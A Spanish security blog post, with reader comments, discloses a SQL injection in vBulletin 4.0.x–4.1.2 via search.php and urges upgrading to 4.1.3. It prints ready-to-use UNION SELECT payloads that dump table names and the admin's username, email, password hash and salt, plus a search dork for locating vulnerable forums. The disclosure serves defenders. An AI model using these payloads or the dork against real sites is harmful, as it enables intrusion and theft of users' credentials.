vBulletin vulnerable a inyección SQL en search.php

vBulletin es un famoso software de foros basado en PHP y MySQL. El mes pasado se reportó una seria inyección SQL que afectaba a sus versiones 4.0.x, 4.1.0, 4.1.1 y 4.1.2 y recientemente esa vulnerabilidad se está empezando a utilizar para atacar e infectar a múltiples foros.

El código vulnerable se encuentra en:
/vb/search/searchtools.php – línea 715;
/packages/vbforum/search/type/socialgroup.php – línea 201:203;

Y podemos inyectar las sentencia SQL a través de la búsqueda (search.php), concretamente en la petición POST de "Búsqueda con múltiples tipos de contenido" marcando "Grupos":

Ej:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0×3a,email,0×3a,password,0×3a,salt)
FROM user WHERE userid=1#

Actualmente existen multitud de sitios vulnerables (Dork : inurl:"search.php?search_type=1") por lo que ¡se recomienda actualizar lo antes posible a la versión 4.1.3!

Referencias:
Sucuri Research Blog
Information Security News and Exploits
J0hn.X3r

3 comentarios :

  1. Interesante artículo, hace unos días ya publicamos en Hacktimes la vulnerabilidad e incluso la ampliamos con un método para sacar la versión del vBulletin instalado. Pongo el enlace por si alguien quiere profundizar más en el fallo:

    http://www.hacktimes.com/vulnerabilidad_de_sqli_en_vbulletin/

    ResponderEliminar
  2. muy buena entrada y muy completa!
    Se me pasó leerla y eso que la tenemos en nuestro blogroll..
    yo lo leí en Twitter, y vosotros? Y eso que la entrada con el advisory (http://j0hnx3r.org/?p=818) era del 11 de abril :P
    por cierto, genial también lo de sacar la versión y vuestros PoC!

    ResponderEliminar
  3. Vicente, vimos el advisory hace tiempo por full disclosure y nos pusimos a trabajar y a investigar algo más el tema. Al final salió el artículo que has visto. Nos alegra que te haya gustado. Un saludo y a seguir así!!!!

    ResponderEliminar